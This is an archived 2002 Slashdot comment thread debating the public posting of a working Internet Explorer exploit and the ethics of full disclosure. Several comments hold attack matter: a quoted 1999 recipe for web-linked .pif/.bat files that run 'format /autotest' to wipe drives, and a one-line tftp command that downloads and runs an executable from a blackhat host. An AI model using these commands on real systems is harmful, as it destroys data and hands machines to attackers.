Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!


Forgot your password?

Controversy Surrounds Huge IE Hole 907

Suchetha wrote in with a Wired News bit talking about security hole in IE that allows malicious web pages to reformat a hard drive. The Wired talks more about bugtrack's handling of the whole thing, and how it essentially posted working code for the exploit. Was it irresponsible or not?
This discussion has been archived. No new comments can be posted.

Controversy Surrounds Huge IE Hole

Comments Filter:
  • Active content... (Score:4, Informative)

    by wowbagger ( 69688 ) on Tuesday November 19, 2002 @01:10PM (#4707463) Homepage Journal
    I cannot help but notice that in almost all cases, the security problems in both IE and Mozilla have been in the realm of active content - Javascript, Flash, and ActiveX.

    Hence why I as a matter of course disable them.

    How about encouraging webmasters and web designers to avoid requiring them unless absolutely necessary?
  • Re:Irresponsible? (Score:4, Informative)

    by Proaxiom ( 544639 ) on Tuesday November 19, 2002 @01:11PM (#4707486)
    It's not as easy as that. The folks at Symantec have a good point: it was already available in a number of public forums, so disclosure wasn't an issue anymore.

    The criticism has a bit of a different skew:
    "Symantec's actions give the impression that they are encouraging people to create and release malicious code. Given that Symantec also sells security and antivirus software, I think there is a terrible conflict of interest here."

    I have to admit I wonder about this myself from time to time.

  • by Anonymous Coward on Tuesday November 19, 2002 @01:11PM (#4707489)
    Posting as Anon since I don't need the Karma:


    Serious Internet Explorer Defect

    This is a developing issue and the information presented here is preliminary in nature and subject to frequent changes. Last significant update - 11/08/02-1830


    A simple way to exploit an unfixed defect in Internet Explorer has been discovered that allows malicious web sites, and possibly malicious email messages read with Outlook or Outlook Express, to take control of a computer. All you would need to do is click a web link and the owner of the web site could take almost any action they desired on your computer.

    Simple, working exploit software was recently published to a public mailing list.

    There is no patch to fix the problem. Anti-virus and personal firewall software will not prevent an exploit. It is hoped that Microsoft will provide a patch to fix this defect in the near future.

    It is impossible to predict how, when, or even if someone will take advantage of this but due to the ease with which bad things can be accomplished it was decided to post an announcement. Nothing at all may happen. Or someone could write a virus or put up a malicious web site to take advantage of the situation at any time. The last time a defect exploit with similar characteristics was published, it was quickly incorporated into many email viruses making it unnecessary to click an attachment to get infected.

    The following practices are recommended for users of Internet Explorer, Outlook, and Outlook Express until more information becomes available:

    1. Users of Outlook and Outlook Express should perform the following simple, unobtrusive procedure to disable scripts from executing in email messages:

    Click the Tools menu item and select Options

    Click the Security tab

    In Outlook Express, make sure the Virus Protection security zone is set to Restricted site zone as shown in the window below:

    In Outlook, make sure the Secure Content Zone is set to Restricted Sites as shown in the window below:

    These are the default settings for Outlook 2002 and Outlook Express 6. Users of earlier versions should change the setting to Restricted.

    2. Indiscriminate browsing of untrusted or questionable web sites should be avoided or scripting should be disabled as described in the additional security measures below. Note that hyper links sometimes appear in email or instant messages. If these messages are from malicious individuals, they could lead you to a malicious web site.

    3. Indiscriminate clicking of hyper links in unexpected or suspect email messages, instant messages, and peer sharing resources should be avoided or scripting should be disabled in Internet Explorer as described in the additional security measures below.


    There is only one technical defense against an exploit at the present time and that is to disable scripting in Internet Explorer, Outlook, and Outlook Express. Instructions for disabling scripting in the mail clients were included in the recommendations above and should have little or no effect on day to day use.

    Unfortunately, disabling scripting in Internet Explorer will adversely affect the operation of many web sites including E-campus and the Windows Update Site. There is, however, a way to specify trusted web sites that are are allowed to use scripting and disable it for all others. Users desiring to decrease risk may follow the instructions at the following web site under the section titled "Optional Internet Explorer Security Measures":

    http://www.jmu.edu/computing/info-security/engin ee ring/issues/ie.shtml#opt

    Risk associated with this exploit and most others can be somewhat reduced by using a non-Administrative Windows account when browsing the web, reading email, and other day to day computer use.

    The defect has been verified in Internet Explorer 5.5 and 6 SP1 running on Windows 98 and XP SP1 respectively. It is likely all varieties of 5.5 and 6 are vulnerable. A quick attempt on a Windows 95 computer running IE 5.0 was unsuccessful but not enough research was done to know why.

    A possible symptom of an exploit is a Window similar to the one below suddenly appearing on your screen after clicking a hyperlink or opening an email message. The exact appearance of the Window may vary depending upon the version of Internet Explorer and operating system. Note that this window will appear if you click Help and under that circumstance the window appearance is not an indication of an exploit. If you are affiliated with James Madison University and see this window unexpectedly appear after clicking a web hyperlink or reading an email message, please contact Gary Flynn at x82364 ASAP. People affiliated with James Madison University can find my home number in the local directory and are encouraged to call me at home if such an event takes place after normal working hours.
  • by psocccer ( 105399 ) on Tuesday November 19, 2002 @01:16PM (#4707551) Homepage
    Basically this is the same as another exploit posted to the list earlier, but with a new command. And for that matter, jelmer has been posting a new IE local zone exploit like every week... Any of them could have been used to make something like this, it's just no one has tried to do a format. True the jelmer posts didn't include the "run a program with arguments" thing that was posted this week, but they did show how to read/write arbitrary files and execute them. So batch file somewhere and here comes a HD format.

    So the only reason we haven't seen this I think is because like always, virus creators want their program to spread, and the quickest way to stop the spread is to kill your host, so instead we get mass mailers, trojans, etc. It was going to happen eventually.
  • Re:Of course it was? (Score:5, Informative)

    by chef_raekwon ( 411401 ) on Tuesday November 19, 2002 @01:26PM (#4707666) Homepage
    try reading the article:

    "The vulnerability is well-known within the security community and the information posted on Bugtraq was information that had been copied or linked from other public forums,"

    Symantec insists that it was already publically available. This is simply a very well known/well respected company alerting both the public and the problem company of the possible problems. In reality, when a company as large as Symantec makes a stink like this, the offending company will be quick to resolve the issue.

    and isnt that what this is all about? Patching a security issue?
  • by CrystalFalcon ( 233559 ) on Tuesday November 19, 2002 @01:29PM (#4707697) Homepage
    And possibly -1 RTFE (Exploit).

    The advisory quoted only points out how it is possible to combine already well-known OTHER exploits into a way to run commands with parameters in the local context.

    Also, last time I checked, you could not format a hard drive just by typing "Format C:". You also have to type "yes" two or three times, quote the volume label back to the FORMAT program, and a couple of other safeguards. Saying that "Web sides format your harddrive" is sensationalism. Yes, they can run programs on your hard disk. (We've seen these kinds of sploits before. They're bad, yes, but not new.) But can it format your hard drive? Not so.

    It should also be noted that the exploit paper points out that the author has discovered another way to achieve the same effect, but that details will not be disclosed until the vendor (MS) has patched the problem.

    I don't think it is irresponsible (at least not of the magnitude suggested) to quote others' works and say that the vulnerabilities still exist.
  • by corvi42 ( 235814 ) on Tuesday November 19, 2002 @01:33PM (#4707744) Homepage Journal
    This is completely false.

    If a sysadmin is able to have access to specific code that causes such an exploit, he can develop filters on a web proxy to prevent his network from accessing such pages, and thereby prevent large scale disasters. Without access to the actual code in question, he would not be able to do this and would be at the mercy of M$ to provide a patch quickly.
  • by CrystalFalcon ( 233559 ) on Tuesday November 19, 2002 @01:43PM (#4707847) Homepage
    Actually, this is worth wasting a computer for. Let's find out. The man page for format does not mention any /y switch, so I'm sceptical, but let's try it nevertheless. There is no volume label on the drive, so I've removed that safeguard by hand as I try this:
    C:\>format c: /y
    Invalid parameter - /y
    What a disappointment. I had almost started to prepare for making a shiny new installation here. Ohwell, at least we know it doesn't work (like I claimed in the first place).
  • pleeaase... (Score:3, Informative)

    by Tom ( 822 ) on Tuesday November 19, 2002 @01:47PM (#4707903) Homepage Journal
    Not the whole full-disclosure discussion again. The topic has been discussed to death on pretty much every security-related mailing list, newsgroup, whatever for the past years.

    And frankly, if you surf with IE, which has known security holes that have been unpatched for well over a year, you simply deserve whatever you get.
  • by Charles Dodgeson ( 248492 ) <jeffrey@goldmark.org> on Tuesday November 19, 2002 @01:50PM (#4707940) Homepage Journal
    The most sensible thing I've ever read about this kind of question is crptogram article [counterpane.com] last year by Bruce Schneier.
  • by zyklone ( 8959 ) on Tuesday November 19, 2002 @01:56PM (#4708003) Homepage
    Ok, I expected that more people read bugtraq.. which is obviously not the case.

    Their version of november is not actually the real november. From Andreas Sandblads mail:
    "Microsoft was initially contacted 2002-10-04."

  • by Anonymous Coward on Tuesday November 19, 2002 @02:01PM (#4708057)
    >1. You're ready to have a hair-trigger response to the constant stream of security patches and updates you'll need to use. You probably have up-to-date virus protection software, and you probably work in an office with really paranoid, on-the-ball IT staff.

    1a. windows will update itself, should i care to let it do so.
    1b. so will my anti-virus software

    >2. For whatever reason, you don't care that your files could get mangled, erased, and resent: Maybe nothing's that critical, maybe you're just playing around, maybe you make constant backups.

    maybe nothing's been mangled, erased, or resent, since i bought my first copy of windows (xppro) a year ago. (ditto at work, but on 2kpro) plenty of hardware failures (fuck you very much ibm), but no file corruption. have i EVER gotten files mangled by an OS? yes. by windows? yes. how about *nix? yes again. making constant backups isn't a demonstration of the unreliability of an OS to manage critical data, it's a demonstration of how critical the data being backed up is.

    > 3. You're completely irresponsible.
    obviously not completely, because i'm succumbing to this troll with merely an anon post.

    >If you had a nice apartment in the middle of New York, and you constantly left the front door unlocked, and then one day somebody walked in stole your stereo, I'd feel bad for you. But, you know, not too bad.
    ditto. speaking of open doors, you did remember to turn off all the crazy shit mandrake installs by default, and patch all your server proggies, and setup your ipchaining, and tunneling for the X server... etc. etc.

  • by neoThoth ( 125081 ) on Tuesday November 19, 2002 @02:06PM (#4708117) Homepage
    This is just a copy of Andreas Sandblads advisory, with a new command.


    note: prefix altered in "wwx". Needs to be reversed into "www" to make the URL work -

    The above url when viewed WILL FORMAT THE A:\ drive when viewed on a fully updated and patched windows system. If you go there make sure there is nothing in the A:\ that formating will harm; because this has been tested
    and works on Windows 2000 WinXP/home/corp/pro Win98/SE.

    This is a harmless POC to give you experts here a heads up; because Microsoft HAS been informed of the hole; but they seem to be sitting on there hands maybe much like the recent XP hole that they knew about before XP even shipped; but chose to wait until SP1 to correct.

    This is VERY DANGEROUS, and this little harmless POC could quite easy be made to be quite nasty; but when the author of the original hole who's hole I have sort of legoised and made to work a very little bit differently Microsoft had this to say to the original author:

    "Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response were that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone".
  • Re:No!!! (Score:3, Informative)

    by Beautyon ( 214567 ) on Tuesday November 19, 2002 @02:07PM (#4708126) Homepage
    There was no need to add that payload to the exploit.

    The way that the example was written (its modular) made it trivial to add any function you want to it; pop up a window, run notepad.exe, delete a drive...all it takes is a simple substitution.

    I have to agree that if millions of people had thier installations deleted something would happen, at the minimum, everyone, everywhere would be scared shitless about surfing with IE....and that would be a very good thing.

    This is "terrorism" right?
  • Re:Active content... (Score:3, Informative)

    by RAMMS+EIN ( 578166 ) on Tuesday November 19, 2002 @02:09PM (#4708161) Homepage Journal
    ``web only''
    You got it right there. The problem is that M$IE is at the core of M$ Windows. It's not just the web browser, it's also the file manager. This means that it both runs scripts provided on websites, and modifies the local hard drive. Does this sound like two things that can't be combined without huge security issues? It does to me.

    In addition, Micro$oft has decided that standard technologies like JavaScript and Java aren't good enuogh for them. They need to have JScript, VBScript, MicroSoft Virtual Machine (which they claim is Java compatible - it may have been, once, but it certainly isn't today), and ActiveX. All these are new implementations, developped by one company, boud to make the mistakes that may already have been patched in more established efforts made by the rest of the world. Reinventing the wheel is not only redundant, but also dangerous.

    Moreover Micro$oft's feauture-geilheit has led them to make Internet software do things it has no business of doing. Email programs execute programs sent as attachments, ActiveX allows webpages to do things with DLLs on your hard drive. This is just bound to lead to holes. Keep It Simple, Stupid!

    In all fairness, I have to add that there are some pretty nasty things in non-MicroSoft technologies as well. Take, for example, Java. It suffers from the same it's-for-the-web-but-also-for-real-programs disease as M$IE, VBScript, and ActiveX. It is true that those features that access the local computer have been shielded off pretty well in Java, but there _could_ be holes.

    And even without these holes, Java applets can do a lot of harm. What if, for example, someone operating a popular website included some Java Applet that openened a TCP/IP link to somewhere it received instructions from, and then, on the master's command, launched a DDoS attack on some site? But then, this sort of thing is almost impossible to prevent - supposedly the owner of this popular website could just cause all visitors to be redirected to the site he wanted to attack. Slashdot linking comes to mind...

    Now that we're talking about sockets, I just need to make the case for sockets in JavaScript. I know that people are fiddling with XML-RPC and SOAP these days, to make websites more interactive. I can't see how these could make websites more interactive than common HTTP POST based implementations - in fact, XML-RPC and SOAP _are_ HTTP POST. JavaScript was developed with the specific purpose of making websites more interative - by enabling them to change without the user having to send a new HTTP request. Many things, like editors, mail clients, etc. work just fine with HTML forms and a little JavaScript. The one type of application that doesn't work with this model is the type that requires realtime interaction with the server. It can be kludged by having JavaScript submit invisible forms, but all those HTTP request and response headers seem like a lot of wasted bandwidth if you just want to send a short message, not to mention the overhead from having to make a new connection for each reqest, as was the case with the old HTTP 1.0 . Sockets are flexible. Sockets are simple. Lack of sockets is the last thing that keeps me from writing all my software (well...) in HTML and JavaScript. Do I _really_ need to have my visitors download a multi-megabyte Java plugin just to get socket support? Sorry for the rant, just had to say it.
  • by Webmonger ( 24302 ) on Tuesday November 19, 2002 @02:16PM (#4708265) Homepage
    Yes, it would be responsible reporting. It would make clear to the public that internet censorship will not prevent crime or terrorism, an excuse that is used all too often to promote internet censorship.

    It would also demonstrate the ludicrousness of the DMCA: you're allowed to explain how to destroy the world, but if you explain how to view an explanation that might enable people to violate copyright, you can go to jail.

    The only reason it might be irresponsible reporting is if there was more important news that they couldn't print on the front page as a result.

    Iraq, a country with far more resources than The People's Movement For Some Obscure Cause, still hasn't built an atom bomb, so it's unlikely your hometown will be vaporized soon. Atom bombs aren't easy to build.

    This is the problem with analogies.
  • He Gave Them a Month (Score:5, Informative)

    by serutan ( 259622 ) <snoopdoug AT geekazon DOT com> on Tuesday November 19, 2002 @02:18PM (#4708280) Homepage
    If you read Sandblad's actual BugTraq posting [securityfocus.com] you will see that he had notified Microsoft more than a month before posting the details of the exploit. Quoting:

    Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response were that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone".

    How much time does a company have to actually fix a problem this serious? When somebody takes the trouble to notify a company about a defect, they've already demonstrated helpfulness and responsibility. It would make sense for the company to take that helpful, responsible person into the loop, and at least update them periodically about what is being done about the problem. That would give a helpful person like Sandblad a basis for continuing to wait. In this case Microsoft gave no indication that they were doing anything about the problem or intended to do anything about it. Continuing to sit on the information certainly wouldn't give them any further incentive. Sandblad reported this problem, got a thanks-but-no-thanks, then after a month of no news went over their heads to the public. I would say he handled it very responsibly.
  • by zurab ( 188064 ) on Tuesday November 19, 2002 @02:19PM (#4708308)
    If they cared about preserving security for users, or getting the defect fixed, they'd have given the working code exclusively to the defect owner.

    From the article:

    The vulnerability is well-known within the security community and the information posted on Bugtraq was information that had been copied or linked from other public forums...

    1. People who are actively looking for such security holes for the sole reason of exploiting them already have this information and the exploit.

    2. The "owner" of the bug should be actively monitoring the security of its products, the key word being *actively*. This means they should have more information than the attacker and abuser, and fix the serious security holes before they become public. The passive attitude that is

    - we won't fix it until someone points it out to us and gives us a working exploit
    - we'll let PR handle this for couple of months
    - we'll cry foul if anyone discloses vulnerability to public
    - we'll wait until our marketing department OKs our new service pack

    will not do and is not appropriate.

    Posting working malicious code to the general population serves NO BENEFIT to anyone other than those with malicious intentions.

    Actually, it allows everyone interested to:

    - easily check and verify if and how they are vulnerable
    - fix their security, adjust their settings, etc. to protect their vulnerabilities
    - easily test that their changes have indeed taken effect and will protect them against the stated attacks.

    You can properly describe 99.99% of bugs without giving people the tools to take advantage of it.

    Vague and/or general descriptions of bugs expand the distance between "general population" and security, that they simply do not care about exploits and security holes. An average person (or even average admin) seeing 30+ unfixed security bugs in IE, that in a hypothetical scenario, on a hypothetical website could hypothetically be exposed to such exploits, will not spend a week and a half (or more) understanding and fixing their security. A working exploit with the proper warnings and understanding, in my opinion, brings them closer to the reality and makes them more responsible towards staying actively aware of security now and in the future.
  • Re:OT but relevant (Score:4, Informative)

    by Espen ( 96293 ) on Tuesday November 19, 2002 @02:21PM (#4708327)
    A simple 'ps ux' suggest IE runs as the user who launched it, not root. Something else must be going on here.
  • Worse than goatse (Score:4, Informative)

    by phorm ( 591458 ) on Tuesday November 19, 2002 @02:29PM (#4708443) Journal
    Not to troll, but perhaps slashdotters should be extra careful of the links they click (for those on IE) in the near future.
    Goatse is disturbing and easily detected, but I'd imagine that this script could be setup almost anywhere, making it easy to slip in a slashdot comment.

    And yes, I'm sure there are probably enough trolls on here that somebody would try it if they knew how.
  • by Anonymous Coward on Tuesday November 19, 2002 @02:36PM (#4708532)
    Looks like automated formats via "mined" web pages in Explorer have been around for a while now. This Bugtraq link is from back in 1999:

    http://online.securityfocus.com/archive/1/28213/ 20 02-09-30/2002-10-06/0

    Bits of note include:

    "The key is the Format command's "/autotest" flag, which I believe was
    put into place early on in MS-DOS's history to assist in batch
    processing, and was probably dropped from the documentation some time
    back (it's not in my DOS 5.0 manual as far as I can tell -- although
    that's not too far in the past). It can be tested for by entering:
    "Format a: /autotest" at the MS-DOS C:\ prompt.

    The automated format via web page can be accomplished as follows (with
    the example shown demonstrating how to create a link on a web page which
    will automatically format Drive A):

    1) Either:

    Create a .pif file ("Format.pif") with the Command Line set to:

    "C:\WINDOWS\COMMAND\FORMAT.COM a: /autotest"

    And Working Line set to:



    Create a .bat file ("Format.bat") with a single command:

    "format a: /autotest"

    (Should the user wish to format another disk, the a: may be
    replaced with c:, d:, e:, etc.)

    2) Link to the file on a web page as follows:

    Click Me [slashdot.org]


    Click Me [slashdot.org]

    According to the method chosen for implementation in step 1. These
    links may be placed beneath graphics or text, as would be found on a
    regular web page.

    3) Upload the html document and .pif or .bat file to the targetted web
    server directory and wait for an unwary user to click the link and

    Spooky, eh?

    These steps don't create a Trojan Horse so much as an out-right "Cyber Mine" which will be activated on a user's machine the instant they click the link and accept the file into their system. As the download of the 1k file is almost instantaneous, damage will be made to the user's data in a matter of seconds. "
  • True. True. (Score:3, Informative)

    by CrystalFalcon ( 233559 ) on Tuesday November 19, 2002 @02:40PM (#4708567) Homepage
    All intricacies of the built-in format command aside, the instant you run code on my computer, it's not my computer anymore.

    And to be honest, I'd be much more scared about something like
    tftp -i ftp.blackhats.net GET /pub/ownj00.exe & ownj00.exe
    than I would about having my hard disk formatted.

    (Didja know there's a one-step command-line FTP in Windows? Very useful for this kind of activity.)
  • by Monkeyman334 ( 205694 ) on Tuesday November 19, 2002 @02:41PM (#4708587)
    You are either a Windows 98 user or not a Windows user at all, because you don't seem to know the first thing about Joe Schmoe security in Windows. Windows XP, Me, and quite possibly Windows 2000 all have auto update features. It notifies you when there are updates to be downloaded, then it will automatically download them, press again to install, and the changes will take effect next time you reboot. I never go more than a day without a security updates, all with less effort than checking my email. If you chose to you could also set it not to prompt you before installing updates, but with all the FUD slashdot likes to spread about XP running behind your back, I thought I'd let everyone know the process that *does* prompt you and shows you a list of the updates. And it does let you uninstall updates if for some ungodly reason it breaks some software.
  • Re:I disagree. (Score:4, Informative)

    by Tyrall ( 191862 ) on Tuesday November 19, 2002 @02:42PM (#4708598) Homepage
    How about over a month and after specifically denying there was an issue?
    Microsoft were informed (from the BugTraq posting, not third hand) on October 4th.

    Quoting direct from the original Bugtraq advisory dated 6th November (incidentally, not the link to a ZDNet forum which seems to have got everyone fussing):


    Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response were that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone".

    Microsoft KNEW of the issue, and actually dismissed the issue, saying it was a necessary feature.

    Don't shoot the messenger, shoot the retards who despite proof to the contrary regard bugs as feature.

  • Re:Active content... (Score:3, Informative)

    by Malcontent ( 40834 ) on Tuesday November 19, 2002 @02:51PM (#4708695)
    "What if, for example, someone operating a popular website included some Java Applet that openened a TCP/IP link to somewhere it received instructions from, and then, on the master's command, launched a DDoS attack on some site? "

    I thought applets could only open up sockets to the server they were loaded from. Has this changed? If not then your scenario would never happen.
  • by Anonymous Custard ( 587661 ) on Tuesday November 19, 2002 @03:05PM (#4708841) Homepage Journal
    After reading the proof-of-concept script at http://online.securityfocus.com/archive/1/298748 [securityfocus.com], I now know at least to avoid blind links.

    Also, I've come up with this possible solution:

    In IE, bring the potentially malicious page to the front, then press Ctrl-O to get the Open prompt. Enter this:


    then click OK. Now anytime that a javascript on that page tries to do a location.replace command will now instead issue a null command (no command at all). (Assuming the script hasn't already been activated, under an onLoad event or something)

    This works with annoying exit pop-up ads too:

    You can do this with all sorts of javascript commands that get abused. Find some offensive pages, look at their source, and disable the commands you see used often. (onunload is probably the worst and most often used).

    Major inspiration from this cnet builder page [netscape.com].
  • by Anonymous Coward on Tuesday November 19, 2002 @03:22PM (#4709070)

    IMHO, if BugTraq is going to post vulns, they need to be non-working, and the user has to have the knowledge to fix them. Especially on closed platforms, it does less good release exploits for code you can't fix, because you're not fixing the problem, you're just working around it.

    Great. You've now thrown up a speedbump.

    [h4x0r] dude! u see that sploit on bugtraq?
    [z3r0c001] yea but its broken
    [h4x0r] i no but i talked 2 m4sterbl4ster, he is l33t and fixed it
    [h4x0r] u want a copy
    [z3r0c001] yea!!!!

    Not all punks are scriptkiddies.

    Secondly, much of an issue is a something only the vendor can do. And the vendors have historically shown that they will not address security issues unless sufficiently motivated. Vendors are businesses. And customer demand is the motivation vendors best understand.

    Unfortunately, customer demand is only created by sufficiently demonstrating a problem. Its one thing to claim something exists. Its entirely different to DEMONSTRATE that it exists. The dirty little non-secret is that such demonstrations ultimately involve considerable pain to the very people who would be saved.

    And that is where the main message is being lost. Yes, the public is realizing that there is some serious security problems out there. But instead of demanding better products, they blame the messanger. Instead of asking "why is my email client so insecure", the question asked is "why do people write viruses?"

    The emporer has no clothes. And instead of dealing with the issue at hand, we have "experts" demanding that those who are posting notices about this situation to the public stop. As if the situation would improve if everyone just ignored it. Perhapse less people would see the naked emporer if they stopped looking. It would make the tailor's union happy. And it would probably please those who publish and sell expensive books on the subject. But it does nothing for the public, nor ultimately the emporer him/itself.
  • Re:OT but relevant (Score:1, Informative)

    by Anonymous Coward on Tuesday November 19, 2002 @03:31PM (#4709155)
    Ummm... if the user doesn't have access to these directories, then why does making a "link in my browser"(is that a bookmark or a ln -s?) suddenly allow you to have access to those files? Perhaps you do not understand the security?
  • by karlm ( 158591 ) on Tuesday November 19, 2002 @03:32PM (#4709168) Homepage
    IMHO, if BugTraq is going to post vulns, they need to be non-working, and the user has to have the knowledge to fix them. Especially on closed platforms, it does less good release exploits for code you can't fix, because you're not fixing the problem, you're just working around it.

    umm... I think the cracker community has thier own system of karma, in the form of reputations. The guy who fixes the exploits for the kiddies gets massive ammounts of karma. There are plenty of smart people willing to fix the exploits for the kiddes, if nothing else, it raises the "noise floor" for hunting down the skilled crackers. Posting broken exploits isn't security though obscurity, it's security though denial.

  • Re:Easy (Score:2, Informative)

    by pbrammer ( 526214 ) on Tuesday November 19, 2002 @03:49PM (#4709337)
    "It's irresponsible to post a working exploit prior to notifying the code maintainer of the existence of the problem."

    Did you read the bugtraq post? He did notify the vendor. So back off.

  • by arkanes ( 521690 ) <arkanes@@@gmail...com> on Tuesday November 19, 2002 @03:58PM (#4709410) Homepage
    You post working code but put a minor syntax error in it, like failing to derefrence a pointer or leaving out a bracket or something. Script kiddies don't know how to code, so they won't be able to compile the exploit.
  • by Plugh ( 27537 ) on Wednesday November 20, 2002 @01:11AM (#4713266) Homepage

    The link [securityfocus.com] on securityfocus for the Netscape exploit is very pertinent to this discussion. It's a 4-month old exploit -- in Mozilla -- that allows malicious code to run on the client. I should hope it's obvious why that's relevant.

    Also, it's quite a good writeup, with more or less exactly the fix spelled out for the developers. Of course, the obvious question is, whoever went to all that trouble, why didn't they go the extra few yards and submit the patch to mozilla.org [mozilla.org]?

IN MY OPINION anyone interested in improving himself should not rule out becoming pure energy. -- Jack Handley, The New Mexican, 1988.